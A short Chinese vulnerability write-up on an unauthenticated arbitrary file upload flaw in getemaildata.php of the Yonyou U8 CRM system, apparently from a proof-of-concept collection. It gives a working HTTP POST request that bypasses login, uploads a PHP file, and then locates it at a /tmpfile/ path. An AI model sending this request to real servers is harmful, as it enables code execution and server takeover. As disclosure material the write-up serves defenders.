# 用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞

# 漏洞描述

用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传漏洞,攻击者通过漏洞可以获取到服务器权限,攻击服务器

# 漏洞影响


# 网络测绘


# 漏洞复现

登陆页面

img

验证POC

POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ

------WebKitFormBoundarykS5RKgl8t3nwInMQ
Content-Disposition: form-data; name="file"; filename="test.php "
Content-Type: text/plain

<?php phpinfo();?>

------WebKitFormBoundarykS5RKgl8t3nwInMQ
1
2
3
4
5
6
7
8
9
10
11

img

文件名需要十六进制减一

/tmpfile/updD24D.tmp.php
1